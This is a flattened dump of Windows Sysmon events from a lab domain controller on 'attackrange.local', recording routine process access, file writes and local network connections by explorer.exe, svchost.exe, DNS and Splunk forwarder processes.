22:54:54.114{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6945-603D-5987-00000000AD01}1516C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696089Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.114{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6945-603D-5987-00000000AD01}1516C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696088Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.114{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6945-603D-5987-00000000AD01}1516C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696087Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.114{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6945-603D-5987-00000000AD01}1516C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696086Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.114{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6945-603D-5987-00000000AD01}1516C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696085Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.114{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6945-603D-5987-00000000AD01}1516C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696084Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.114{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6945-603D-5987-00000000AD01}1516C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696083Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.114{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6945-603D-5987-00000000AD01}1516C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696082Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.114{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-7946-6039-1610-00000000AD01}3144C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+a3000|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018B4AF7)|UNKNOWN(FFFF9F0F018AF181)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a686b|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad 10341000x80000000000000001696081Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.114{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-7946-6039-1610-00000000AD01}3144C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a2ae1|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018B4AF7)|UNKNOWN(FFFF9F0F018AF181)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a686b|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000001696080Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.114{05ADC7E1-7946-6039-1610-00000000AD01}3144ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms~RF10d135ba.TMPMD5=90C4070A96FD82D4DFD0CA69DCA4CA68,SHA256=1084D8781CEB35810FF5D86D9FA84A2F7944B90E10CF009B2EE3A0DB44F151A4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001696683Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:55.833{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3BEA3FE62A2B6E608B85FD50FCAFA71F,SHA256=48517527D353BA21810B3470DB8E8EF970F1B50713893917AC29B8266B07EB83,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001696682Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:55.599{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=73952CA03D6609C96B58F408A300A607,SHA256=5B328A605373696F9AD975BF5EED6703FB074B400C40B3ADD8C864CC6F8A811C,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001696681Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:46.515{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local55149-false10.0.1.12-8000- 23542300x80000000000000001696684Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:56.614{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5C06F217AD2281B16E982B1505D04B9F,SHA256=03E75B0FAA16770AEE940EF43369890F4D4C4D8DC39AF982A177F2DB9580F1DF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001696686Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:57.630{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AE104B5E1BDE64096C62426C42D935E4,SHA256=AA4687AC8030E65C8C583A57D43E3D2F07B7E12D987ED3CD47D40BD3AC7D5AF6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001696685Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:57.489{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=040143BB1E19E0ACE50E046B28C43F81,SHA256=39407D64F9AFC6B2708DBD71C468DDB0468839E7C2024A2733F856C2F0503AA0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001696687Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:58.645{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4162AD0F4D3962CC2041256E561CF736,SHA256=9A507A690EE6FA655036FE26C2E9FF75971BAF686CAB5467192D9E32583E2AA5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001696689Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:59.646{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=270A4D4AFC2441E551D48BD45E5F27FC,SHA256=7B65704CBF5C36275BD263048318622AF465C80AE112A016A98B37A2B09075F5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001696688Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:59.286{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D205844CEDA05A6AEFC44460FC699B6D,SHA256=2F734EF9C76483184164AD640B172E6C4394EB614F88706DDC086FB82927C13E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001696692Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:00.664{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6E31B2912C5E1D423E4603162A759DD5,SHA256=4BFABF83BB5C282471C71A5CFF4EC4155EE9DD0C8D5CFC866A58C9048BD349F4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001696691Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:00.521{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5B5F777F2DFC3A2333D8ADE2B90CD030,SHA256=C98D8D83B5D013FDE2AA19DDAC5C2DBCFBF70910AC05709D169167CED8BFDEFE,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001696690Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:51.608{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local55151-false10.0.1.12-8000- 23542300x80000000000000001696695Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:01.708{05ADC7E1-FB1F-603C-5979-00000000AD01}6484NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=D04DD730C2DFA173B41D98E6E0FBCE24,SHA256=25BD0354816452BB32A75B30DADE46EF8E59DD04BE7128F431B20468F632A399,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001696694Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:01.692{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A13EC77BF6D9E8BE5963471A00F5EB7E,SHA256=25C8B13F1B3FCCE1960ECB15A870B87E7045ADA45FE0419AB7214E381FC91F5F,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001696693Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:52.842{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local50421- 23542300x80000000000000001696698Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:02.708{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1A8A7E5FF9E325590BCD10F4CC6FC214,SHA256=4289D0FBA23F2AA64A4B9521F45206401F487CC9A8D6A3B5336A2B95FD68C5C5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001696697Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:02.708{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C54E223B2501C59F4C8F5051A63EF500,SHA256=1EADD28EBA26607B8BF5F2E8F39501EC5E6ADCA16D8FD51A9883029FC42D2FFE,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001696696Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:53.858{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1win-dc-974.attackrange.local53domainfalse127.0.0.1win-dc-974.attackrange.local50421- 23542300x80000000000000001696704Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:03.896{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7E41816C2D046BACDEE99E98F582064A,SHA256=FCD45F03A972A5895CBCFAFC4CEC391D798C8480423150EE90549A97EBE1B8FB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001696703Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:03.724{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7054E739BF80440531B6D65DD6A93D44,SHA256=EBF2702F580DA039DB260EE9640DA88916090036FFAEE131B37C534006C70881,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001696702Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:03.708{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-229F-6039-1500-00000000AD01}1492C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696701Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:03.708{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-229F-6039-1500-00000000AD01}1492C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696700Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:03.708{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-229F-6039-1500-00000000AD01}1492C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 354300x80000000000000001696699Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:55.046{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local55152-false10.0.1.12-8089- 23542300x80000000000000001696706Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:04.802{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2C1C9E422EC87EB0F805D0E7F0B3F480,SHA256=D07DAB1EE666727FD4C2E39E30899B8D0EBC118E7B4F71B6962B14F2713E2DEE,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001696705Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:56.217{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local56111- 23542300x80000000000000001696719Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:05.817{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CD50B0A76DC31D7927BADA808F8BA462,SHA256=D72D460FAFCF73B5E2E657BF6CC46D0AFFA6196DEFF36B15DB3D2BEA47836748,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001696718Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:05.786{05ADC7E1-70C9-603D-6788-00000000AD01}87609028C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696717Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:05.599{05ADC7E1-FB20-603C-5D79-00000000AD01}16523928C:\Windows\system32\conhost.exe{05ADC7E1-70C9-603D-6788-00000000AD01}8760C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 